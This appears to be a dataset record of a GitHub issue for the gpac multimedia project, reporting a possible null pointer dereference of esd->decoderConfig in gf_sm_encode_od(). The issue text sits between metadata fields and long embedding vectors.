-0.003128423821181059, -0.01344845350831747, 0.010304952971637249, 0.019584687426686287, -0.0017328830435872078, 0.0032754221465438604, -0.0018723428947851062, -0.02820858359336853, 0.005518087651580572, 0.006464153062552214, 0.00022685785370413214, 0.004519253503531218, -0.017971476539969444, 0.0028118123300373554, -0.016780413687229156, 0.005781930405646563, 0.011857856996357441, -0.015996422618627548, -0.000179625247255899, 0.015197355300188065, -0.005732931196689606, -0.000984699698165059, 0.0016216920921579003, -0.008329899981617928, 0.009166658855974674, 0.0073574502021074295, 0.018438855186104774, -0.00001833060923672747, -0.0014775206800550222, 0.009920496493577957, 0.0126267708837986, 0.002702506026253104, -0.00590631365776062, -0.01477520726621151, -0.0007378180744126439, 0.020609905943274498, -0.0013295802054926753, -0.010357721708714962, 0.001642422517761588, -0.01611703634262085, 0.004564483650028706, -0.003049270948395133, -0.001791305374354124, 0.0070144543424248695, 0.008360053412616253, 0.040194593369960785, 0.0063699232414364815, 0.0008188555366359651, -0.009784805588424206, 0.027695974335074425, -0.0042704869993031025, -0.02029329538345337, -0.006682765670120716, 0.00000817147611087421, 0.00028480906621553004, 0.0017517289379611611, -0.008337438106536865, -0.017293022945523262, 0.010146647691726685, 0.006984300445765257, -0.018303165212273598, 0.014601824805140495, -0.0026233531534671783, 0.006158849224448204, 0.001567038823850453, 0.015001358464360237, 0.018634852021932602, -0.012151854112744331, 0.011217095889151096, -0.007681599818170071, -0.001041237497702241, 0.0007462986977770925, 0.002649737289175391, -0.013229841366410255, -0.00026808332768268883, -0.012378005310893059, 0.018499162048101425, -0.02920364961028099, 0.0067129191011190414, 0.02122805267572403, -0.018529316410422325, -0.018318241462111473, -0.020187757909297943, -0.01448121014982462, 0.004455177113413811, -0.003968952223658562, 0.031781770288944244, -0.009905419312417507, 0.01340322382748127, 0.008186670951545238, -0.0005163783789612353, 0.005352243315428495, 0.009769728407263756, -0.002169166225939989, -0.0028909652028232813, -0.010229568928480148, -0.0017234600381925702, -0.0019024963257834315, -0.015725040808320045, -0.003113347105681896, -0.008752048946917057, 0.029776565730571747, 0.012883075512945652, 0.02041390910744667, -0.017624711617827415, -0.017941322177648544, -0.018469009548425674, -0.018031783401966095, -0.01385552529245615, 0.007338603958487511, 0.018680082634091377, 0.00015488995995838195, -0.00832236185669899, -0.013825371861457825, -0.011164327152073383, 0.01892131008207798, 0.006015620194375515, -0.008465590886771679, -0.015091818757355213, -0.018288087099790573, 0.0014285212382674217, 0.016599493101239204, 0.002694967668503523, 0.027756281197071075, 0.008171593770384789, -0.026384297758340836, -0.003889799350872636, -0.0369078628718853, 0.0032000383362174034, 0.005167553201317787, -0.009701883420348167, -0.00878974050283432, 0.0024631626438349485, -0.025735998526215553, 0.020805902779102325, -0.0025423155166208744, -0.017790555953979492, 0.0023086261935532093, 0.002534777158871293, -0.002003322122618556, 0.0041272579692304134, -0.0010026033269241452, 0.006603613030165434, 0.017865939065814018, -0.011820165440440178, -0.021951736882328987, 0.004798172973096371, 0.008284669369459152, 0.004639867227524519, 0.020127451047301292, -0.014888282865285873, 0.013531375676393509, 0.009588807821273804, 0.01139047835022211, -0.00014652709069196135, -0.007809752132743597, -0.019026847556233406, 0.011986009776592255, 0.0031793080270290375, 0.011744781397283077, 0.010056186467409134, -0.007070991676300764, 0.01003357209265232, 0.016569338738918304, 0.0009658537455834448, 0.0075006792321801186, 0.009279734455049038, -0.0370284765958786, -0.005005478393286467, 0.016840720549225807, -0.009279734455049038, 0.014375673606991768, -0.009324965067207813, -0.015619504265487194, 0.003559995675459504, 0.0018016706453636289, 0.019644994288682938, 0.006588536314666271, 0.00036890903720632195, -0.006407615263015032, -0.021122515201568604, -0.011262326501309872, -0.009483270347118378, -0.016976410523056984, 0.0016009615501388907, 0.013523837551474571, 0.007285835687071085, 0.0069164554588496685, 0.004093335475772619, 0.0030172329861670732, -0.00003713236583280377, -0.0035298422444611788, 0.021680355072021484, -0.003026655875146389, 0.006580997724086046, -0.0036655329167842865, 0.007018223404884338, 0.01530289277434349, -0.010614026337862015, -0.012099085375666618, -0.0016603261465206742, -0.006709150038659573, 0.0023557408712804317, -0.007726829964667559, -0.011149250902235508, 0.004560714587569237, -0.018680082634091377, 0.012852922081947327, -0.021243128925561905, 0.007485602516680956, 0.0019957837648689747, 0.012619232758879662, 0.02175573818385601, 0.014873205684125423, 0.003593918401747942, 0.006234232801944017, 0.009347580373287201, 0.011352786794304848, 0.0005568971391767263, 0.0018101512687280774, -0.0038464537356048822, -0.014111829921603203, 0.014692285098135471, -0.00024476146791130304, 0.012845383957028389, 0.010712024755775928, -0.013538913801312447, -0.010900484398007393, -0.006381230894476175, -0.0011203903704881668, -0.006019389256834984, 0.009709421545267105, 0.01203124038875103, 0.018182551488280296, 0.010945714078843594, 0.026127994060516357, -0.0025498538743704557, -0.004990401677787304, 0.02272064983844757, 0.0163582656532526, 0.0060721575282514095, -0.0023482025135308504, 0.01857454515993595, 0.010146647691726685, 0.01385552529245615, 0.012355390004813671, -0.014684746041893959, 0.018227780237793922, 0.0013135611079633236, -0.011857856996357441, 0.00033027486642822623, -0.011179404333233833, -0.025826457887887955, 0.0047190203331410885, -0.02300710789859295, 0.02665567956864834, 0.023429255932569504, 0.025359079241752625, -0.002150320215150714, -0.006068388465791941, 0.006803379859775305, 0.0004501820949371904, 0.0054427036084234715, -0.027530129998922348, -0.009332503192126751, -0.023459410294890404, 0.004176257643848658, -0.003318767761811614, -0.013342916034162045, 0.009814959019422531, 0.0025762382429093122, 0.006709150038659573, -0.006645074114203453, 0.0004890518030151725, -0.010116493329405785, 0.02578122913837433, 0.02581138163805008, -0.0042252568528056145, 0.008706818334758282, 0.005864852573722601, -0.03169131278991699, 0.005186398979276419, -0.01763978786766529, 0.03033440373837948, -0.0004322784661781043, -0.024243401363492012, -0.003605225821956992, 0.01433798111975193, -0.017323175445199013, -0.011217095889151096, 0.0007439429755322635, -0.023384027183055878, 0.01455659419298172, 0.0068636867217719555, -0.0019543226808309555, 0.0027138134464621544, 0.00017844737158156931, -0.010802485048770905, 0.008932969532907009, 0.01705179549753666, -0.004997939802706242, 0.00783990602940321, -0.006426461040973663, 0.0005215610144659877, -0.00552562577649951, 0.008910354226827621, 0.014594285748898983, -0.010478335432708263, 0.034586045891046524, -0.008608819916844368, -0.005356012377887964, -0.017881015315651894, -0.002613930031657219, -0.007960519753396511, 0.018092090263962746, -0.0017950745532289147, 0.01646380126476288, -0.007289604749530554, 0.0006732707261107862, -0.008397744968533516, 0.013003690168261528, -0.011827703565359116, -0.02250957489013672, 0.0018101512687280774, -0.015619504265487194, 0.0028344274032860994, 0.001671633799560368, 0.009279734455049038, -0.025163082405924797, -0.0163582656532526, -0.006200309842824936, -0.0018977848812937737, 0.0070069157518446445, 0.0011995432432740927, -0.002866465598344803, 0.027349209412932396, 0.03292760252952576, 0.00439487025141716, 0.009995879605412483, 0.0018299395451322198, -0.0029550413601100445, -0.008608819916844368, -0.002791081788018346, -0.019644994288682938, -0.010395413264632225, 0.01982591487467289, 0.018242858350276947, -0.004036797676235437, 0.006792072206735611, 0.001361618284136057, -0.002140897326171398, 0.008940507657825947, -0.003416766645386815, 0.012400619685649872, 0.002596968784928322, 0.015046588145196438, 0.013659528456628323, -0.007436602842062712, 0.013900755904614925, -0.014925974421203136, -0.011006021872162819, 0.004202641546726227, 0.014594285748898983, -0.005084631033241749, 0.020866211503744125, 0.0012673885794356465, -0.0047567118890583515, 0.005895006004720926, 0.004564483650028706, -0.005028093233704567, -0.0002772707084659487, 0.010998482815921307, 0.024710780009627342, 0.016855796799063683, 0.021107438951730728, -0.006535767577588558, -0.012151854112744331, 0.006343539338558912, 0.00830728467553854, -0.0023105107247829437, 0.00783990602940321, 0.01042556669563055, -0.009498347528278828, 0.004617252387106419, -0.007960519753396511, 0.020278217270970345, 0.002385894302278757, -0.001773401745595038, -0.006381230894476175, -0.016313035041093826, 0.010749717243015766, 0.04652682691812515, -0.0017385367536917329, -0.0068184565752744675, -0.013659528456628323, -0.00953603908419609, -0.004715250805020332, -0.03398297727108002, 0.012724770233035088, 0.005073323845863342, 0.017504097893834114, 0.005687701050192118, -0.0008070768089964986, -0.008744509890675545, 0.0046737901866436005, 0.0032433841843158007, -0.009407887235283852, 0.021650200709700584, 0.020278217270970345, -0.018273010849952698, 0.002118282252922654, 0.01997668296098709, -0.026293838396668434, -0.0028174661565572023, 0.017066871747374535, 0.0019062655046582222, -0.0035166500601917505, -0.01062910258769989, -0.002636545104905963, -0.021710507571697235, 0.00546154985204339, -0.008970661088824272, 0.005050708539783955, -0.027515053749084473, -0.030409788712859154, -0.012129238806664944, -0.021092360839247704, -0.010229568928480148, 0.005604778882116079, 0.0018440739950165153, 0.014518902637064457, -0.020836057141423225, -0.004308179020881653, -0.016282880678772926, 0.003273537615314126, 0.006614920683205128, -0.01331276260316372, -0.008540973998606205, 0.00851082056760788, -0.02627876028418541, 0.011277402751147747, 0.0026346605736762285, 0.0025159313809126616, -0.0002798620262183249, 0.00209566717967391, -0.012491080909967422, 0.010538642294704914, -0.019283153116703033, -0.00562739372253418, 0.02665567956864834, -0.0048170192167162895, 0.03148023784160614, 0.0019194576889276505, -0.0050544776022434235, 0.005536933429539204, 0.007530832663178444, 0.0027383132837712765, -0.009588807821273804, 0.0029154650401324034, -0.0040330286137759686, -0.004311948083341122, 0.009716959670186043, -0.015219970606267452, 0.00683353329077363, -0.00788513571023941, -0.01090802252292633, 0.003352690488100052, -0.013252455741167068, -0.01010141707956791, 0.0019232268678024411, 0.010214492678642273, 0.01173724327236414, 0.006867455784231424, 0.017504097893834114, 0.018182551488280296, 0.011722167022526264, 0.0015199240297079086, -0.016795489937067032, 0.005416319705545902, -0.0018563237972557545, 0.010712024755775928, -0.01883085072040558, -0.019207768142223358, -0.02260003611445427, 0.0015717503847554326, 0.0064302305690944195, 0.013305224478244781, -0.011194480583071709, 0.006121157202869654, 0.008932969532907009, -0.010335106402635574, 0.021243128925561905, 0.004504176788032055, 0.018212703987956047, -0.0017517289379611611, -0.011820165440440178, 0.022871417924761772, 0.019313305616378784, 0.006588536314666271, 0.022705573588609695, -0.019252998754382133, -0.02278095670044422, -0.03347036615014076, -0.010659256018698215, -0.000964440347161144, -0.006151310633867979, -0.013682142831385136, -0.004523022565990686, -0.0369681715965271, -0.009438040666282177, 0.022615112364292145, 0.013350455090403557, 0.008480667136609554, 0.022584959864616394, 0.008834971114993095, -0.007877597585320473, -0.003984028939157724, 0.009083736687898636, 0.005714084953069687, 0.014639516361057758, -0.018061935901641846, -0.001888361875899136, 0.02125820517539978, -0.00808867160230875, -0.020368678495287895, 0.05433657765388489, 0.01997668296098709, 0.02047421596944332, 0.008631434291601181, 0.0018261703662574291, 0.012068931944668293, -0.00624930951744318, -0.01652410812675953, -0.014187213964760303, 0.014488749206066132, 0.016041653230786324, -0.01154878456145525, 0.014488749206066132, -0.015219970606267452, -0.0004101344966329634, 0.012068931944668293, -0.009747114032506943, 0.005623624660074711, -0.011480938643217087, -0.020564675331115723, -0.008699280209839344, -0.007975596003234386, 0.019132385030388832, -0.01970530115067959, 0.0013229841133579612, 0.008970661088824272, -0.008096210658550262, 0.0008409994770772755, 0.009995879605412483, -0.018725313246250153, 0.021951736882328987, -0.015785349532961845, -0.016433648765087128, 0.0231880284845829, 0.006580997724086046, 0.010139108635485172, 0.014368134550750256, 0.013365531340241432, 0.0055859326384961605, -0.007749445270746946, -0.013991216197609901, 0.0103652598336339, -0.0027967356145381927, 0.0162074975669384, 0.00590631365776062, -0.009912957437336445, 0.0016612685285508633, 0.0037164168898016214, 0.003113347105681896, 0.01614719070494175, 0.015694888308644295, 0.01393090933561325, -0.004425023682415485, 0.00804344192147255, -0.0025328926276415586, -0.00955111626535654, -0.008050980046391487, 0.0013201572000980377, 0.0014718669699504972, -0.02047421596944332, -0.00535978190600872, -0.007361219264566898, -0.01950930431485176, -0.00004970613372279331, -0.02443939819931984, -0.017881015315651894, -0.0006657323683612049, 0.01670503057539463, -0.02394186519086361, 0.012114161625504494, 0.0040254900231957436, 0.008925431407988071, -0.00135596445761621, -0.010357721708714962, -0.01979576237499714, -0.022434191778302193, 0.017473943531513214, -0.011767396703362465, 0.00532208988443017, 0.014398287981748581, -0.004372254945337772, -0.015951192006468773, 0.007063453551381826, -0.005095938686281443, -0.0025385464541614056, -0.009468194097280502, -0.007086068857461214, -0.007779598701745272, -0.013689681887626648, 0.019283153116703033, 0.009226965717971325, 0.005178860854357481, -0.0299574863165617, -0.01994652859866619, 0.006976762320846319, -0.014586747623980045, -0.00009487746137892827, -0.0032075769267976284, 0.0014775206800550222, 0.01570996455848217, 0.008940507657825947, 0.02356494776904583, -0.02896242029964924, -0.003686263458803296, 0.013041381724178791, -0.021740661934018135, 0.0070144543424248695, -0.017398560419678688, -0.00838266871869564, -0.0036655329167842865, 0.006060850340873003, -0.0008466533035971224, -0.024710780009627342, 0.0010261607822030783, 0.017262868583202362, -0.0010336991399526596, 0.0024518552236258984, 0.002065513515844941, 0.019524380564689636, 0.0025611615274101496, -0.0070069157518446445, -0.0005111958016641438, 0.019554534927010536, 0.014858129434287548, 0.007609985303133726, -0.011186942458152771, 0.006049542687833309, 0.024288630113005638, 0.006927762646228075, 0.01407413836568594, -0.0023595101665705442, -0.021650200709700584, 0.015634581446647644, 0.0033677672035992146, 0.00528439786285162, 0.003987798001617193, -0.010410490445792675, 0.02023298665881157, 0.02169543132185936, 0.009845112450420856, -0.005472857039421797, 0.041973650455474854, -0.004492869134992361, 0.009950649924576283, -0.009822497144341469, 0.006614920683205128, -0.013177072629332542, -0.0033036910463124514, 0.0021484356839209795, -0.026535065844655037, 0.0054427036084234715, 0.007274528034031391, 0.011428169906139374, -0.0023896635975688696, -0.0030624631326645613, -0.006739303469657898, 0.01773024909198284, 0.01770009472966194, -0.009596345946192741, 0.006577228661626577, -0.006204079370945692, 0.0011401786468923092, -0.0031095780432224274, 0.01947914995253086, 0.0019241691334173083, 0.007052145898342133, -0.0007043665391393006, -0.006407615263015032, 0.011179404333233833, -0.008910354226827621, -0.01766994222998619, -0.003314998699352145, 0.004210180137306452, -0.008118825033307076, 0.014880743809044361, 0.014157060533761978, 0.013199687004089355, -0.0023557408712804317, 0.017066871747374535, 0.018242858350276947, 0.017896093428134918, 0.0004638453829102218, -0.019433919340372086, 0.0137952184304595, 0.04227518290281296, 0.005506779998540878, -0.0029041573870927095, -0.01577027142047882, 0.012491080909967422, 0.021936658769845963, -0.0036768403369933367, -0.02459016628563404, 0.016659799963235855, -0.012845383957028389, -0.010892946273088455, 0.02213265746831894, 0.016041653230786324, -0.0034299588296562433, 0.023519717156887054, -0.01228000596165657, -0.0025705844163894653, -0.023836329579353333, -0.028419658541679382, 0.023293565958738327 ]
219
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
https://github.com/gpac/gpac/blob/c5d2a6fc6b0ddccf8e4f60757d024e0b183c531e/src/scene_manager/encode_isom.c#L1291-L1297 There are several places where the esd->decoderConfig are not checked before they are referenced.
Possible null pointer dereference in gf_sm_encode_od()
https://api.github.com/repos/gpac/gpac/issues/1806/comments
0
2021-05-25T14:01:23
2021-05-25T15:07:08Z
https://github.com/gpac/gpac/issues/1806
900,856,687
1,806
false
This is a GitHub Issue repo:gpac owner:gpac Title : Possible null pointer dereference in gf_sm_encode_od() Issue date: --- start body --- https://github.com/gpac/gpac/blob/c5d2a6fc6b0ddccf8e4f60757d024e0b183c531e/src/scene_manager/encode_isom.c#L1291-L1297 There are several places where the esd->decoderConfig are not checked before they are referenced. --- end body ---
376
[ -0.0012319523375481367, 0.053038500249385834, -0.01027748268097639, 0.021456880494952202, -0.013594207353889942, 0.025340940803289413, -0.019318467006087303, 0.03284721076488495, -0.009957447648048401, 0.007142595946788788, -0.025864634662866592, 0.023566201329231262, 0.021456880494952202, 0.04064442589879036, -0.0016883655916899443, 0.04591045156121254, -0.00946284830570221, -0.0034749237820506096, -0.0030603331979364157, -0.003482197178527713, 0.043670207262039185, -0.046492334455251694, -0.001609266153536737, 0.015638066455721855, -0.00011364873353159055, 0.016307229176163673, -0.03534930199384689, 0.00036458513932302594, -0.006553440820425749, -0.005760627333074808, 0.00840818788856268, 0.010662979446351528, -0.008560932241380215, 0.01407425943762064, 0.04922717809677124, 0.013805138878524303, 0.026693815365433693, 0.031101567670702934, -0.006127940025180578, 0.029035888612270355, -0.007040766533464193, -0.041866376996040344, -0.0334290936589241, 0.003742225468158722, -0.007371711544692516, 0.017281880602240562, 0.010146559216082096, 0.019405748695135117, -0.016772735863924026, 0.0021875109523534775, 0.023697124794125557, -0.04041167348623276, -0.020642247051000595, -0.06266864389181137, -0.009266463108360767, -0.03948066011071205, 0.020453136414289474, 0.009906533174216747, -0.0032985408324748278, 0.040586236864328384, -0.024133536964654922, 0.01930391974747181, -0.012204964645206928, -0.004902351647615433, 0.009870165027678013, 0.014925261028110981, -0.009942900389432907, 0.00837182067334652, 0.00036413053749129176, 0.0014101534616202116, 0.010939372703433037, -0.05053640902042389, -0.027668466791510582, 0.052252959460020065, 0.04573588818311691, -0.034156445413827896, 0.04669599235057831, 0.04797613248229027, -0.004876894410699606, -0.005633340682834387, 0.002943956758826971, 0.007029856089502573, -0.01413244754076004, -0.007615374401211739, 0.005749716889113188, -0.041226305067539215, -0.02269337885081768, -0.06674180924892426, 0.005029638297855854, -0.01123031321913004, -0.0066407229751348495, 0.022402439266443253, -0.017180051654577255, 0.014765243977308273, 0.02193693444132805, -0.013201436959207058, -0.033516377210617065, -0.01053932961076498, 0.005426045041531324, 0.0024893619120121002, -0.027072038501501083, -0.018954791128635406, 0.008415461517870426, 0.025457317009568214, 0.007819033227860928, 0.011004834435880184, 0.036338500678539276, 0.0035531141329556704, 0.01854747347533703, 0.12789756059646606, 0.0072298781014978886, -0.04099355265498161, -0.007586280349642038, -0.009251915849745274, 0.009244643151760101, 0.012088588438928127, -0.03139250725507736, -0.026882926002144814, 0.023129791021347046, -0.023566201329231262, 0.0023493466433137655, -0.025791898369789124, -0.006993488408625126, 0.020802265033125877, -0.01667090505361557, 0.05399860441684723, -0.014910713769495487, -0.022096950560808182, -0.03822961822152138, -0.010961193591356277, -0.02352256141602993, -0.03555295988917351, 0.010190200060606003, 0.003125794930383563, 0.008219076320528984, 0.0031385235488414764, -0.02164599299430847, 0.021689634770154953, 0.008117247372865677, 0.009004616178572178, -0.0875149816274643, -0.03182892128825188, 0.03694947808980942, -0.02577735111117363, -0.027799390256404877, -0.0064879790879786015, 0.0020329486578702927, 0.03549477458000183, -0.05280574783682823, -0.007309886626899242, -0.029064983129501343, -0.01204494759440422, 0.008495470508933067, -0.011128484271466732, 0.0438738688826561, 0.02072952874004841, 0.009557404555380344, 0.003018510527908802, -0.0445721261203289, 0.023464372381567955, -0.011113937012851238, -0.01757282204926014, 0.009513762779533863, -0.02653379738330841, -0.010248388163745403, -0.03860783949494362, 0.02107865922152996, 0.006495252717286348, -0.021631445735692978, 0.022897038608789444, -0.03412735089659691, 0.011543074622750282, -0.024555400013923645, -0.012837761081755161, -0.03488379716873169, -0.02905043587088585, 0.017063675448298454, 0.02186419814825058, -0.03540749102830887, -0.0025875545106828213, -0.025151828303933144, 0.0034149172715842724, 0.01572534814476967, 0.010408406145870686, 0.014539764262735844, -0.014525217935442924, 0.02472996525466442, -0.015536236576735973, 0.02001672424376011, -0.03051968663930893, 0.013092334382236004, -0.001506527652963996, 0.010801175609230995, -0.016845470294356346, 0.023798953741788864, -0.02152961678802967, -0.05373675748705864, -0.02129686437547207, -0.023347996175289154, -0.00884459912776947, 0.018111063167452812, 0.0021111390087753534, 0.019580313935875893, 0.011201219633221626, -0.02299886755645275, -0.015943553298711777, -0.02857038378715515, 0.02480269968509674, 0.0035312934778630733, -0.04195365682244301, -0.012946863658726215, -0.053154878318309784, 0.03337090462446213, -0.013186889700591564, -0.009404660202562809, 0.013586933724582195, -0.027493901550769806, -0.00630250433459878, -0.004935082513839006, -0.00846637599170208, 0.048412542790174484, -0.011506707407534122, 0.014721602201461792, -0.0061133927665650845, -0.005520600825548172, -0.011644904501736164, 0.0023020687513053417, -0.00916463416069746, 0.0063825128600001335, 0.01655452884733677, 0.01787831075489521, 0.016845470294356346, 0.019260277971625328, -0.029966898262500763, -0.005920644383877516, -0.0031567073892802, 0.0346219502389431, -0.017369164153933525, -0.01870749145746231, 0.005084190052002668, -0.014707055874168873, 0.049576304852962494, -0.02017674222588539, -0.013972430489957333, -0.012801393866539001, 0.056995294988155365, 0.0015774444909766316, -0.022111497819423676, 0.010415679775178432, 0.026242857798933983, -0.01172491256147623, -0.05091463401913643, -0.0013456010492518544, 0.005917007569223642, 0.0037349520716816187, 0.004767791833728552, 0.02347891964018345, 0.04131358861923218, -0.027799390256404877, -0.023158885538578033, 0.012532273307442665, -0.02878858894109726, -0.004484124481678009, -0.041226305067539215, -0.0206276997923851, -0.018678396940231323, -0.008386367931962013, -0.002689383691176772, -0.004127722233533859, -0.010488414205610752, 0.04445574805140495, -0.024133536964654922, -0.055831532925367355, -0.003709494834765792, 0.0053023952059447765, 0.020569512620568275, 0.008459102362394333, 0.01518710795789957, 0.01134668942540884, 0.02574825845658779, -0.02539912797510624, -0.02280975505709648, -0.027348432689905167, 0.020525870844721794, 0.007244424894452095, 0.032905399799346924, 0.007149869110435247, 0.006520709954202175, -0.00666981702670455, 0.013994250446557999, 0.03607665374875069, 0.021995121613144875, -0.061737630516290665, 0.015667160972952843, -0.01544895488768816, 0.020147647708654404, -0.005233297124505043, 0.005098736844956875, -0.031741637736558914, 0.00563697749748826, -0.006920753512531519, 0.012423170730471611, -0.017223693430423737, -0.003267628373578191, -0.0426810085773468, -0.003333090106025338, -0.032992683351039886, -0.03395278751850128, 0.000033611613616812974, 0.013623300939798355, 0.04142996296286583, -0.05207839608192444, -0.01780557446181774, -0.03526202216744423, 0.005378767382353544, -0.02646106295287609, -0.018823867663741112, -0.007913588546216488, -0.004796885885298252, 0.04195365682244301, -0.01228497363626957, -0.00769538339227438, -0.009615592658519745, -0.0266792681068182, 0.024366289377212524, -0.007218967657536268, -0.007098954636603594, 0.023420730605721474, -0.08629303425550461, 0.0038876959588378668, 0.021384146064519882, 0.016016289591789246, 0.03078153356909752, -0.02838127128779888, 0.002367530483752489, -0.023464372381567955, -0.033778224140405655, -0.00496781338006258, 0.01128850132226944, -0.026170121505856514, 0.01595810055732727, -0.013179617002606392, 0.027973953634500504, -0.02081681229174137, 0.0022729746997356415, -0.006964394357055426, 0.012183144688606262, -0.010342944413423538, 0.02307160198688507, -0.006786193232983351, 0.000750990875530988, 0.010299302637577057, 0.01697639375925064, -0.016321776434779167, 0.02326071448624134, 0.006291593890637159, -0.027799390256404877, -0.010757534764707088, -0.005095100030303001, 0.01738371141254902, 0.017398256808519363, -0.0348547026515007, 0.015012543648481369, 0.031479790806770325, 0.0037531359121203423, 0.02238789200782776, 0.01591446064412594, -0.021238675341010094, 0.03680400550365448, -0.0071316855028271675, -0.006397060118615627, 0.010342944413423538, -0.04716149717569351, -0.00848819687962532, -0.0055060540325939655, 0.016379965469241142, 0.01163035724312067, 0.02302796207368374, -0.03680400550365448, 0.022824302315711975, -0.02382804825901985, 0.014357926324009895, 0.00044618494575843215, -0.030927002429962158, 0.009608319029211998, 0.03625122085213661, -0.04332108050584793, 0.07197874784469604, -0.020787717774510384, -0.013114155270159245, -0.04681237041950226, 0.04317560791969299, -0.005575152579694986, -0.03523292765021324, 0.0066479966044425964, 0.016656359657645226, -0.003256718162447214, -0.013485104776918888, 0.006047931034117937, -0.0212241280823946, 0.0098410714417696, -0.02186419814825058, -0.00570243876427412, 0.0012874128296971321, -0.003616757458075881, 0.02665017358958721, 0.014685234986245632, 0.014263371005654335, 0.02976324036717415, 0.011441245675086975, 0.007644468452781439, -0.03523292765021324, -0.02777029573917389, -0.014001524075865746, 0.029705051332712173, 0.036454878747463226, -0.011317595839500427, 0.03389459848403931, -0.018227439373731613, 0.010146559216082096, -0.022038763388991356, 0.024526305496692657, -0.001963850110769272, 0.02077317051589489, 0.05103100836277008, 0.008517290465533733, -0.03590209037065506, 0.033923693001270294, 0.053794946521520615, -0.0126850176602602, 0.00452412897720933, -0.00858275219798088, -0.013121428899466991, -0.019172996282577515, 0.005171472206711769, -0.01483070570975542, -0.02539912797510624, -0.03011236898601055, -0.014779791235923767, 0.01010291837155819, -0.020380400121212006, 0.0259664636105299, -0.004578680265694857, 0.021165940910577774, 0.031625259667634964, -0.04791794344782829, -0.047772474586963654, -0.0365130640566349, 0.03075243905186653, -0.002903952496126294, -0.004505944903939962, 0.005396950989961624, 0.021515069529414177, -0.023115243762731552, 0.014597952365875244, 0.02264973893761635, -0.01192857138812542, -0.0038440548814833164, 0.03526202216744423, 0.007949956692755222, -0.035698432475328445, 0.020744075998663902, -0.004265918862074614, 0.004455030430108309, 0.03372003510594368, 0.0018538382137194276, -0.01603083685040474, -0.032498084008693695, 0.00776084465906024, -0.02055496536195278, 0.005378767382353544, 0.00316579919308424, 0.0015747168799862266, -0.0013365091290324926, -0.013936062343418598, 0.037618640810251236, -0.014910713769495487, 0.0037822299636900425, 0.017820121720433235, -0.017107317224144936, -0.0017683743499219418, -0.011186672374606133, 0.004556859843432903, 0.030432403087615967, -0.006600718479603529, -0.00001849633190431632, 0.034156445413827896, 0.015230748802423477, -0.005826088599860668, -0.004164089914411306, -0.0005823360988870263, 0.028439460322260857, 0.008640940301120281, -0.018823867663741112, 0.01336145494133234, -0.012161323800683022, -0.0033530923537909985, -0.004975087009370327, 0.02283884957432747, 0.019289372488856316, -0.010408406145870686, -0.012510452419519424, 0.0666254386305809, -0.005498780403286219, 0.001594719011336565, -0.028061237186193466, -0.011812195181846619, 0.026431968435645103, -0.00743353646248579, -0.002691202098503709, 0.00044641224667429924, -0.029937803745269775, -0.010292029939591885, -0.03834599256515503, 0.00525875436142087, 0.004742334596812725, 0.009208275005221367, 0.014314285479485989, 0.008655487559735775, 0.015405313111841679, -0.016467247158288956, -0.009470121935009956, 0.010808449238538742, 0.06255226582288742, 0.021631445735692978, 0.06319233030080795, 0.010088371112942696, 0.013616027310490608, -0.00846637599170208, -0.01272138487547636, -0.02947229892015457, -0.013288719579577446, -0.004855073988437653, 0.03578571230173111, 0.0031167028937488794, -0.012495906092226505, -0.01621994748711586, 0.011135757900774479, 0.0031567073892802, -0.0022984319366514683, -0.008968248963356018, 0.036600347608327866, -0.043030139058828354, 0.0050332751125097275, -0.009601045399904251, 0.021616898477077484, -0.005877003539353609, -0.01228497363626957, -0.02091864123940468, -0.010342944413423538, 0.007717203814536333, -0.02397351898252964, -0.005807904992252588, 0.01870749145746231, -0.014212456531822681, 0.005444229114800692, -0.01768919825553894, 0.046346861869096756, 0.011099389754235744, 0.006138850003480911, 0.01723824068903923, 0.0026511976029723883, 0.014437935315072536, -0.03965522721409798, 0.029152264818549156, 0.015245296061038971, -0.020351305603981018, 0.010706620290875435, -0.028730399906635284, -0.018081968650221825, -0.003693129401654005, -0.022096950560808182, 0.014088806696236134, 0.005367856938391924, -0.004054986871778965, -0.006986215244978666, 0.010088371112942696, 0.005789721384644508, -0.002711204346269369, -0.020976828411221504, -0.019798519089818, -0.05309668928384781, -0.00948466919362545, 0.01572534814476967, 0.0032749020028859377, 0.0004986906424164772, 0.009448301047086716, -0.0027493902016431093, 0.027304790914058685, -0.011143031530082226, 0.015143467113375664, 0.0007064405363053083, 0.014154268428683281, -0.006858928594738245, -0.0016647266456857324, -0.00808815285563469, 0.013463283888995647, 0.019783971831202507, -0.01324507873505354, -0.029792334884405136, -0.029850522056221962, 0.020234929397702217, -0.015783537179231644, -0.035843901336193085, -0.02502090483903885, 0.0069171166978776455, -0.0010492050787433982, -0.001609266153536737, -0.035058360546827316, 0.02923954650759697, -0.021966027095913887, 0.03465104475617409, 0.030839720740914345, -0.013237805105745792, 0.0005123285227455199, 0.00026593805523589253, 0.014088806696236134, 0.007342617493122816, 0.010212020948529243, 0.022227874025702477, 0.03278902545571327, -0.020234929397702217, 0.007211694028228521, -0.023013414815068245, 0.002734843175858259, 0.04169180989265442, 0.01324507873505354, -0.02205331064760685, -0.001835654373280704, -0.018809320405125618, -0.023129791021347046, 0.008044512011110783, -0.017558274790644646, -0.025791898369789124, -0.02160235121846199, 0.0141106266528368, -0.0002095682721119374, -0.005051459185779095, -0.0038295078556984663, 0.028919512405991554, 0.009346472099423409, 0.010815722867846489, -0.05158379673957825, -0.010728440247476101, -0.007044403348118067, 0.000631887000054121, 0.007862674072384834, 0.0017647375352680683, 0.007309886626899242, 0.015856271609663963, -0.019856706261634827, -0.040818989276885986, 0.01963850110769272, 0.006815287284553051, 0.0348547026515007, -0.008451828733086586, 0.031247038394212723, 0.0140524385496974, -0.0010810267413035035, -0.006120666395872831, -0.018649302423000336, -0.03267264738678932, -0.022533362731337547, -0.03357456251978874, -0.006931663490831852, 0.014721602201461792, 0.0020838631317019463, -0.0002963959123007953, -0.03459285572171211, -0.0010401132749393582, 0.0018474739044904709, -0.015565331093966961, 0.0055787889286875725, -0.009470121935009956, 0.009397386573255062, -0.0008169070933945477, -0.022184234112501144, 0.014328832738101482, -0.01475069671869278, -0.006458885036408901, 0.00023798045003786683, -0.006502525880932808, 0.02582099288702011, 0.025981010869145393, -0.003696765983477235, 0.0037204050458967686, -0.03156707435846329, -0.017180051654577255, -0.046375956386327744, -0.023391637951135635, 0.022140592336654663, 0.012539546936750412, 0.014176088385283947, 0.061854004859924316, -0.010408406145870686, -0.02491907589137554, 0.03837508708238602, -0.012219511903822422, -0.02499181218445301, 0.027901219204068184, -0.02088954672217369, 0.0187365859746933, -0.003778593149036169, -0.028090329840779305, -0.008386367931962013, 0.03168344870209694, 